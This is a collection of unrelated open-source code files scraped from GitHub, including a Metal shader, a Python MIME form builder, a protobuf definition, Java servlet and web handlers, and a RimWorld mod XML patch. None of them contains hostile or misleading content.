spvUnsafeArray<float4, 3> _146 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge2, patchIn.gl_in[1].in_var_PN_DominantEdge2, patchIn.gl_in[2].in_var_PN_DominantEdge2 });
spvUnsafeArray<float4, 3> _147 = spvUnsafeArray<float4, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge3, patchIn.gl_in[1].in_var_PN_DominantEdge3, patchIn.gl_in[2].in_var_PN_DominantEdge3 });
spvUnsafeArray<float3, 3> _148 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge4, patchIn.gl_in[1].in_var_PN_DominantEdge4, patchIn.gl_in[2].in_var_PN_DominantEdge4 });
spvUnsafeArray<float3, 3> _149 = spvUnsafeArray<float3, 3>({ patchIn.gl_in[0].in_var_PN_DominantEdge5, patchIn.gl_in[1].in_var_PN_DominantEdge5, patchIn.gl_in[2].in_var_PN_DominantEdge5 });
float _190 = gl_TessCoord.x * gl_TessCoord.x;
float _191 = gl_TessCoord.y * gl_TessCoord.y;
float _192 = gl_TessCoord.z * gl_TessCoord.z;
float4 _198 = float4(gl_TessCoord.x);
float4 _202 = float4(gl_TessCoord.y);
float4 _207 = float4(gl_TessCoord.z);
float4 _210 = float4(_190 * 3.0);
float4 _214 = float4(_191 * 3.0);
float4 _221 = float4(_192 * 3.0);
float4 _235 = ((((((((((_136[0][0] * float4(_190)) * _198) + ((_136[1][0] * float4(_191)) * _202)) + ((_136[2][0] * float4(_192)) * _207)) + ((_136[0][1] * _210) * _202)) + ((_136[0][2] * _214) * _198)) + ((_136[1][1] * _214) * _207)) + ((_136[1][2] * _221) * _202)) + ((_136[2][1] * _221) * _198)) + ((_136[2][2] * _210) * _207)) + ((((patchIn.in_var_PN_POSITION9 * float4(6.0)) * _207) * _198) * _202);
float3 _237 = float3(gl_TessCoord.x);
float3 _240 = float3(gl_TessCoord.y);
float3 _254 = float3(gl_TessCoord.z);
float3 _256 = ((_128[0].xyz * _237) + (_128[1].xyz * _240)).xyz + (_128[2].xyz * _254);
float4 _259 = ((_129[0] * _198) + (_129[1] * _202)) + (_129[2] * _207);
float3 _264 = _235.xyz;
float3 _265 = _256.xyz;
float3 _266 = _259.xyz;
float3 _272 = _264 + float3(View.View_WorldCameraOrigin);
float _279 = float(int(gl_TessCoord.x == 0.0));
float _282 = float(int(gl_TessCoord.y == 0.0));
float _285 = float(int(gl_TessCoord.z == 0.0));
float _286 = _279 + _282;
float _287 = _286 + _285;
float4 _387;
float3 _388;
if (float(int(_287 == 2.0)) == 1.0)
{
float _363 = float(int((_282 + _285) == 2.0));
float _367 = float(int((_285 + _279) == 2.0));
float _370 = float(int(_286 == 2.0));
_387 = ((float4(_363) * _138[0]) + (float4(_367) * _138[1])) + (float4(_370) * _138[2]);
_388 = ((float3(_363) * _139[0]) + (float3(_367) * _139[1])) + (float3(_370) * _139[2]);
}
else
{
float4 _358;
float3 _359;
if (float(int(_287 == 1.0)) != 0.0)
{
float4 _304 = float4(_279);
float4 _306 = float4(_282);
float4 _309 = float4(_285);
float4 _311 = ((_304 * _146[0]) + (_306 * _146[1])) + (_309 * _146[2]);
float4 _316 = ((_304 * _147[0]) + (_306 * _147[1])) + (_309 * _147[2]);
float3 _331 = float3(_279);
float3 _333 = float3(_282);
float3 _336 = float3(_285);
float3 _338 = ((_331 * _148[0]) + (_333 * _148[1])) + (_336 * _148[2]);
float3 _343 = ((_331 * _149[0]) + (_333 * _149[1])) + (_336 * _149[2]);
_358 = ((_304 * ((_202 * _311) + (_207 * _316))) + (_306 * ((_207 * _311) + (_198 * _316)))) + (_309 * ((_198 * _311) + (_202 * _316)));
_359 = ((_331 * ((_240 * _338) + (_254 * _343))) + (_333 * ((_254 * _338) + (_237 * _343)))) + (_336 * ((_237 * _338) + (_240 * _343)));
}
else
{
_358 = float4(_259.xyz, 0.0);
_359 = _265;
}
_387 = _358;
_388 = _359;
}
float3x3 _398;
if (float(int(_287 == 0.0)) == 0.0)
{
_398 = float3x3(_388, cross(_387.xyz, _388) * float3(_387.w), _387.xyz);
}
else
{
_398 = float3x3(_265, cross(_266, _265) * float3(_259.w), _266);
}
float3 _411 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[0].xyz) + View.View_GlobalVolumeCenterAndExtent[0].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[0].xyz + View.View_GlobalVolumeCenterAndExtent[0].www) - _272, float3(0.0)));
float _547;
if (fast::min(_411.x, fast::min(_411.y, _411.z)) > (View.View_GlobalVolumeCenterAndExtent[0].w * View.View_GlobalVolumeTexelSize))
{
_547 = View_GlobalDistanceFieldTexture0.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[0u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[0u].xyz), level(0.0)).x;
}
else
{
float3 _436 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[1].xyz) + View.View_GlobalVolumeCenterAndExtent[1].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[1].xyz + View.View_GlobalVolumeCenterAndExtent[1].www) - _272, float3(0.0)));
float _535;
if (fast::min(_436.x, fast::min(_436.y, _436.z)) > (View.View_GlobalVolumeCenterAndExtent[1].w * View.View_GlobalVolumeTexelSize))
{
_535 = View_GlobalDistanceFieldTexture1.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[1u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[1u].xyz), level(0.0)).x;
}
else
{
float3 _459 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[2].xyz) + View.View_GlobalVolumeCenterAndExtent[2].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[2].xyz + View.View_GlobalVolumeCenterAndExtent[2].www) - _272, float3(0.0)));
float3 _475 = fast::min(fast::max((_272 - View.View_GlobalVolumeCenterAndExtent[3].xyz) + View.View_GlobalVolumeCenterAndExtent[3].www, float3(0.0)), fast::max((View.View_GlobalVolumeCenterAndExtent[3].xyz + View.View_GlobalVolumeCenterAndExtent[3].www) - _272, float3(0.0)));
float _480 = fast::min(_475.x, fast::min(_475.y, _475.z));
float _523;
if (fast::min(_459.x, fast::min(_459.y, _459.z)) > (View.View_GlobalVolumeCenterAndExtent[2].w * View.View_GlobalVolumeTexelSize))
{
_523 = View_GlobalDistanceFieldTexture2.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[2u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[2u].xyz), level(0.0)).x;
}
else
{
float _511;
if (_480 > (View.View_GlobalVolumeCenterAndExtent[3].w * View.View_GlobalVolumeTexelSize))
{
_511 = mix(View.View_MaxGlobalDistance, View_GlobalDistanceFieldTexture3.sample(View_GlobalDistanceFieldSampler0, ((_272 * View.View_GlobalVolumeWorldToUVAddAndMul[3u].www) + View.View_GlobalVolumeWorldToUVAddAndMul[3u].xyz), level(0.0)).x, fast::clamp((_480 * 10.0) * View.View_GlobalVolumeWorldToUVAddAndMul[3].w, 0.0, 1.0));
}
else
{
_511 = View.View_MaxGlobalDistance;
}
_523 = _511;
}
_535 = _523;
}
_547 = _535;
}
float3 _565 = _264 + ((_398[2] * float3(fast::min(_547 + Material.Material_ScalarExpressions[0].z, 0.0) * Material.Material_ScalarExpressions[0].w)) * float3(((_137[0] * gl_TessCoord.x) + (_137[1] * gl_TessCoord.y)) + (_137[2] * gl_TessCoord.z)));
float4 _574 = View.View_TranslatedWorldToClip * float4(_565.x, _565.y, _565.z, _235.w);
float4 _579 = _574;
_579.z = _574.z + (0.001000000047497451305389404296875 * _574.w);
out.gl_Position = _579;
out.out_var_TEXCOORD6 = ((_120[0] * _198) + (_120[1] * _202)) + (_120[2] * _207);
out.out_var_TEXCOORD7 = ((_121[0] * _198) + (_121[1] * _202)) + (_121[2] * _207);
out.out_var_TEXCOORD10_centroid = float4(_256.x, _256.y, _256.z, _118.w);
out.out_var_TEXCOORD11_centroid = _259;
out.gl_ClipDistance[0u] = dot(View.View_GlobalClippingPlane, float4(_565.xyz - float3(View.View_PreViewTranslation), 1.0));
return out;
}
| {
"pile_set_name": "Github"
} |
Name: var39
Rank: 2
Dimensions: 2 x 1
Class Type: Structure
Data Type: Structure
Fields[4] {
Name: field1
Rank: 2
Dimensions: 1 x 1
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
1 + 51i
}
Name: field2
Rank: 2
Dimensions: 3 x 4
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
2 + 52i 5 + 55i 8 + 58i 11 + 61i
3 + 53i 6 + 56i 9 + 59i 12 + 62i
4 + 54i 7 + 57i 10 + 60i 13 + 63i
}
Name: field1
Rank: 2
Dimensions: 1 x 1
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
14 + 64i
}
Name: field2
Rank: 2
Dimensions: 3 x 4
Class Type: Single Precision Array (complex)
Data Type: IEEE 754 single-precision
{
15 + 65i 18 + 68i 21 + 71i 24 + 74i
16 + 66i 19 + 69i 22 + 72i 25 + 75i
17 + 67i 20 + 70i 23 + 73i 26 + 76i
}
}
| {
"pile_set_name": "Github"
} |
def form_builder(parts):
global _mimifiers
form_mime = mimify('multipart', _subtype = 'form-data')
for props in parts:
_name = props.get('name')
_type = props.get('type')
_val = props.get('value')
_kws = props.get('kws', {})
disp_kws = props.get('disposition', {})
mime_part = _mimifiers.get(_type)(_val, **_kws)
mime_part.add_header('Content-Disposition', 'form-data', name = _name, **disp_kws)
form_mime.attach(mime_part)
return form_mime
_mimifiers = {}
def mimifier(name):
def registerer(f):
global _mimifiers
_mimifiers[name] = f
return f
return registerer
_cap_names = {'nonmultipart' : 'NonMultipart'}
def mimify(type, **kwargs):
cap_name = _cap_names.get(type, type.capitalize())
mime_mod = getattr(__import__('email.mime.%s' % type).mime, type)
mime_type = getattr(mime_mod, 'MIME%s' % cap_name)
return mime_type(**kwargs)
@mimifier('text')
def mime_text(text, encoding = 'utf8'):
return mimify('text', _text = text.encode(encoding), _charset = encoding)
@mimifier('text-noenc')
def mime_text_noenc(text, encoding = 'ascii'):
mimeobj = mimify('nonmultipart', _maintype = 'text', _subtype = 'plain',)
mimeobj.set_payload(text.encode(encoding))
mimeobj.set_charset(encoding)
return mimeobj
@mimifier('application')
def mime_app(data):
return mimify('application', _data = data)
def subtype_for_image(data):
import imghdr, os.path
if hasattr(data, 'read') or os.path.exists(data):
return imghdr.what(data)
else:
return imghdr.what(None, data)
@mimifier('image')
def mime_image(data):
subtype = subtype_for_image(data)
return mimify('image', _imagedata = data, _subtype = subtype)
@mimifier('image-noenc')
def mime_image_noenc(data, filename = None):
import email.encoders as encoders
subtype = subtype_for_image(data)
mimeobj = mimify('image', _imagedata = data, _subtype = subtype, _encoder = encoders.encode_noop)
if filename is not None:
pass
return mimeobj
@mimifier('data')
def mime_data(data):
import email.encoders as encoders
mimeobj = mimify('nonmultipart', _maintype = '', _subtype = '')
mimeobj._headers[:] = []
mimeobj.set_payload(data)
return mimeobj
| {
"pile_set_name": "Github"
} |
/* Generated by RuntimeBrowser.
*/
@protocol MSPHistoryEntryRoute <MSPHistoryEntry>
@required
- (GEOComposedWaypoint *)endWaypoint;
- (bool)isFailed;
- (bool)navigationWasInterrupted;
- (GEOURLRouteHandle *)routeHandle;
- (GEOComposedWaypoint *)startWaypoint;
- (long long)transportType;
@end
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package comprehend provides the client and types for making API
// requests to Amazon Comprehend.
//
// Amazon Comprehend is an AWS service for gaining insight into the content
// of documents. Use these actions to determine the topics contained in your
// documents, the topics they discuss, the predominant sentiment expressed in
// them, the predominant language used, and more.
//
// See https://docs.aws.amazon.com/goto/WebAPI/comprehend-2017-11-27 for more information on this service.
//
// See comprehend package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/comprehend/
//
// Using the Client
//
// To contact Amazon Comprehend with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Comprehend client Comprehend for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/comprehend/#New
package comprehend
| {
"pile_set_name": "Github"
} |
package org.how.tomcat.works.ex02;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLStreamHandler;
import java.io.File;
import java.io.IOException;
import javax.servlet.Servlet;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
public class ServletProcessor2 {
public void process(Request request, Response response) {
String uri = request.getUri();
String servletName = uri.substring(uri.lastIndexOf("/") + 1);
URLClassLoader loader = null;
try {
// create a URLClassLoader
URL[] urls = new URL[1];
URLStreamHandler streamHandler = null;
File classPath = new File(Constants.WEB_ROOT);
// the forming of repository is taken from the createClassLoader method in
// org.apache.catalina.startup.ClassLoaderFactory
String repository = (new URL("file", null, classPath.getCanonicalPath() + File.separator)).toString() ;
// the code for forming the URL is taken from the addRepository method in
// org.apache.catalina.loader.StandardClassLoader class.
urls[0] = new URL(null, repository, streamHandler);
loader = new URLClassLoader(urls);
}
catch (IOException e) {
System.out.println(e.toString() );
}
Class myClass = null;
try {
myClass = loader.loadClass(servletName);
}
catch (ClassNotFoundException e) {
System.out.println(e.toString());
}
Servlet servlet = null;
RequestFacade requestFacade = new RequestFacade(request);
ResponseFacade responseFacade = new ResponseFacade(response);
try {
servlet = (Servlet) myClass.newInstance();
servlet.service((ServletRequest) requestFacade, (ServletResponse) responseFacade);
}
catch (Exception e) {
System.out.println(e.toString());
}
catch (Throwable e) {
System.out.println(e.toString());
}
}
} | {
"pile_set_name": "Github"
} |
{
"ctm": {
"ctm_version": 1,
"type": "ctm",
"textures": [
"chisel:blocks/dirt/reinforcedDirt-ctm"
]
}
} | {
"pile_set_name": "Github"
} |
// Protocol Buffers for Go with Gadgets
//
// Copyright (c) 2013, The GoGo Authors. All rights reserved.
// http://github.com/gogo/protobuf
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
syntax = "proto2";
package unmarshalmerge;
import "github.com/gogo/protobuf/gogoproto/gogo.proto";
option (gogoproto.equal_all) = true;
option (gogoproto.verbose_equal_all) = true;
option (gogoproto.stringer_all) = true;
option (gogoproto.gostring_all) = true;
option (gogoproto.goproto_stringer_all) = false;
option (gogoproto.testgen_all) = true;
option (gogoproto.populate_all) = true;
option (gogoproto.benchgen_all) = true;
message Big {
option (gogoproto.unmarshaler) = true;
optional Sub Sub = 1;
optional int64 Number = 2;
}
message BigUnsafe {
option (gogoproto.unsafe_unmarshaler) = true;
optional Sub Sub = 1;
optional int64 Number = 2;
}
message Sub {
option (gogoproto.unmarshaler) = true;
optional int64 SubNumber = 1;
}
message IntMerge {
option (gogoproto.unmarshaler) = true;
required int64 Int64 = 1 [(gogoproto.nullable) = false];
optional int32 Int32 = 2 [(gogoproto.nullable) = false];
required sint32 Sint32 = 3 [(gogoproto.nullable) = false];
optional sint64 Sint64 = 4 [(gogoproto.nullable) = false];
optional uint64 Uint64 = 5 [(gogoproto.nullable) = false];
required uint32 Uint32 = 6 [(gogoproto.nullable) = false];
optional fixed64 Fixed64 = 7 [(gogoproto.nullable) = false];
optional fixed32 Fixed32 = 8 [(gogoproto.nullable) = false];
required sfixed32 Sfixed32 = 9 [(gogoproto.nullable) = false];
optional sfixed64 Sfixed64 = 10 [(gogoproto.nullable) = false];
optional bool Bool = 11 [(gogoproto.nullable) = false];
}
| {
"pile_set_name": "Github"
} |
/*-
* #%L
* rapidoid-rest
* %%
* Copyright (C) 2014 - 2020 Nikolche Mihajlovski and contributors
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package org.rapidoid.http.handler.optimized;
import org.rapidoid.annotation.Authors;
import org.rapidoid.annotation.Since;
import org.rapidoid.http.FastHttp;
import org.rapidoid.http.HttpRoutes;
import org.rapidoid.http.Req;
import org.rapidoid.http.Resp;
import org.rapidoid.http.handler.AbstractDecoratingHttpHandler;
import org.rapidoid.http.impl.RouteOptions;
import org.rapidoid.lambda.OneParamLambda;
import org.rapidoid.net.abstracts.Channel;
import org.rapidoid.u.U;
@Authors("Nikolche Mihajlovski")
@Since("5.1.0")
public class DelegatingParamsAwareRespHandler extends AbstractDecoratingHttpHandler {
private final OneParamLambda<Object, Resp> handler;
public DelegatingParamsAwareRespHandler(FastHttp http, HttpRoutes routes, RouteOptions options, OneParamLambda<?, ?> handler) {
super(http, options);
this.handler = U.cast(handler);
}
@Override
protected Object handleReq(Channel channel, boolean isKeepAlive, Req req) throws Exception {
return handler.execute(req.response());
}
@Override
public String toString() {
return contentTypeInfo("(Resp) -> ...");
}
}
| {
"pile_set_name": "Github"
} |
open Core_kernel
let () =
Random.self_init();
let n = 1 + Random.int 10
and k = 1 + Random.int 100 in
printf "%d %d\n" n k;
for i = 1 to n do
List.init 3 (fun _ -> Random.int k |> Int.to_string)
|> String.concat ~sep:" " |> print_endline
done
| {
"pile_set_name": "Github"
} |
var SummaryPart = require('../../models/summaryPart');
var indexLevels = require('./indexLevels');
/**
Returns a new Summary with a part inserted at given index
@param {Summary} summary
@param {Part} part
@param {Number} index
@return {Summary}
*/
function insertPart(summary, part, index) {
part = SummaryPart(part);
var parts = summary.getParts().insert(index, part);
return indexLevels(summary.set('parts', parts));
}
module.exports = insertPart;
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8" ?>
<Patch>
<Operation Class="PatchOperationSequence">
<success>Always</success>
<operations>
<li Class="CombatExtended.PatchOperationFindMod">
<modName>[RH] Faction: Umbra Company</modName>
</li>
<!-- ========== Reduce meals and medicine carried by all pawns ========== -->
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[@Name="RH_UmbraCompany_Base"]/invNutrition</xpath>
<value>
<invNutrition>1</invNutrition>
</value>
</li>
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[@Name="RH_UmbraCompany_Base"]/inventoryOptions</xpath>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Gunner" or
defName="RH_UmbraCompany_Grenadier" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite"
]/inventoryOptions/subOptionsChooseOne</xpath>
<value>
<subOptionsChooseOne>
<li>
<thingDef>RNMedicine_IFAK_Multicam</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
<li>
<thingDef>RNMedicine_MedicBag</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
</subOptionsChooseOne>
</value>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_CQB" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_APCCrewman"
]/inventoryOptions/subOptionsChooseOne</xpath>
<value>
<subOptionsChooseOne>
<li>
<thingDef>RNMedicine_IFAK_Multicam</thingDef>
<countRange>
<min>0</min>
<max>1</max>
</countRange>
</li>
</subOptionsChooseOne>
</value>
</li>
<!-- ========== Remove smokepop belt ========== -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault_TierII" or
@Name="RH_UCEliteTierBase" or
defName="RH_UmbraCompany_Trader"
]/apparelTags/li[.="BeltDefensePop"]</xpath>
</li>
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Trader"
]/apparelRequired/li[.="Apparel_SmokepopBelt"]</xpath>
</li>
<!-- ========== Umbra Company faction pawns should spawn backpacks, allowing them to carry their (huge) inventory ========== -->
<li Class="PatchOperationAdd">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_CQB" or
defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Gunner" or
defName="RH_UmbraCompany_Grenadier" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Trader" or
defName="RH_UmbraCompany_APCCrewman"
]/apparelRequired</xpath>
<value>
<li>Apparel_Backpack</li>
</value>
</li>
<!-- ========== Umbra Company faction pawns should spawn with ammo appropriate to their primary weapon, as well as a sidearm (and its own ammo) ========== -->
<!-- First remove redundant M9 HRT from pawns' existing primary weaponTags -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_APCCrewman"]/weaponTags/li[.="RN_M9HRT"]</xpath>
</li>
<!-- Also remove C4 from standard Grenadiers, so the magazine count patch doesn't crowd out the room required for the sidearm -->
<li Class="PatchOperationRemove">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Grenadier"]/weaponTags/li[.="RH_UC_Explosives"]</xpath>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Rogue" or
defName="RH_UmbraCompany_APCCrewman" or
defName="RH_UmbraCompany_Assault" or
defName="RH_UmbraCompany_Assault_TierII" or
defName="RH_UmbraCompany_Boss" or
defName="RH_UmbraCompany_CQB" or
defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Trader"
]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>6</min>
<max>8</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Gunner"]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>3</min>
<max>4</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Grenadier"]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>24</min>
<max>26</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<!-- ========== Tweak minimum weaponMoney for selected pawn types, so that they actually spawn with weapons ========== -->
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Gunner"]/weaponMoney/min</xpath>
<value>
<min>480</min>
</value>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII"
]/weaponMoney/min</xpath>
<value>
<min>400</min>
</value>
</li>
</operations>
</Operation>
</Patch> | {
"pile_set_name": "Github"
} |
using System;
using Coypu.Drivers.Selenium;
namespace Coypu
{
/// <summary>
/// Global configuration settings
/// </summary>
public class SessionConfiguration : Options
{
const string DEFAULT_APP_HOST = "localhost";
const int DEFAULT_PORT = 80;
private string appHost;
/// <summary>
/// New default configuration
/// </summary>
public SessionConfiguration()
{
AppHost = DEFAULT_APP_HOST;
Port = DEFAULT_PORT;
SSL = false;
Browser = Drivers.Browser.Firefox;
Driver = typeof (SeleniumWebDriver);
}
/// <summary>
/// <para>Specifies the browser you would like to control</para>
/// <para>Default: Firefox</para>
/// </summary>
public Drivers.Browser Browser { get; set; }
/// <summary>
/// <para>Specifies the driver you would like to use to control the browser</para>
/// <para>Default: SeleniumWebDriver</para>
/// </summary>
public Type Driver { get; set; }
/// <summary>
/// <para>The host of the website you are testing, e.g. 'github.com'</para>
/// <para>Default: localhost</para>
/// </summary>
public string AppHost
{
get { return appHost;}
set
{
if (Uri.IsWellFormedUriString(value, UriKind.Absolute))
{
var uri = new Uri(value);
SSL = uri.Scheme == "https";
UserInfo = uri.UserInfo;
value = uri.Host;
}
appHost = value?.TrimEnd('/');
}
}
internal string UserInfo { get; set; }
/// <summary>
/// <para>The port of the website you are testing</para>
/// <para>Default: 80</para>
/// </summary>
public int Port { get; set; }
/// <summary>
/// <para>Whether to use the HTTPS protocol to connect to website you are testing</para>
/// <para>Default: false</para>
/// </summary>
public bool SSL { get; set; }
}
} | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: df0ac90e67a8c33408b929ad40c1ab34
timeCreated: 1453913004
licenseType: Store
TextureImporter:
fileIDToRecycleName: {}
serializedVersion: 2
mipmaps:
mipMapMode: 0
enableMipMap: 1
linearTexture: 0
correctGamma: 0
fadeOut: 0
borderMipMap: 0
mipMapFadeDistanceStart: 1
mipMapFadeDistanceEnd: 3
bumpmap:
convertToNormalMap: 0
externalNormalMap: 0
heightScale: .25
normalMapFilter: 0
isReadable: 0
grayScaleToAlpha: 0
generateCubemap: 0
cubemapConvolution: 0
cubemapConvolutionSteps: 8
cubemapConvolutionExponent: 1.5
seamlessCubemap: 0
textureFormat: -1
maxTextureSize: 2048
textureSettings:
filterMode: -1
aniso: -1
mipBias: -1
wrapMode: -1
nPOTScale: 1
lightmap: 0
rGBM: 0
compressionQuality: 50
allowsAlphaSplitting: 0
spriteMode: 0
spriteExtrude: 1
spriteMeshType: 1
alignment: 0
spritePivot: {x: .5, y: .5}
spriteBorder: {x: 0, y: 0, z: 0, w: 0}
spritePixelsToUnits: 100
alphaIsTransparency: 0
textureType: -1
buildTargetSettings: []
spriteSheet:
sprites: []
spritePackingTag:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
object Test {
def main(args: Array[String]): Unit = {
assert(5 == (5: java.lang.Integer))
assert((5: java.lang.Integer) == 5)
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="colorPrimary">#3F51B5</color>
<color name="colorPrimaryDark">#303F9F</color>
<color name="colorAccent">#FF4081</color>
</resources>
| {
"pile_set_name": "Github"
} |
#
# Copyright (c) 2005, 2012, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation. Oracle designates this
# particular file as subject to the "Classpath" exception as provided
# by Oracle in the LICENSE file that accompanied this code.
#
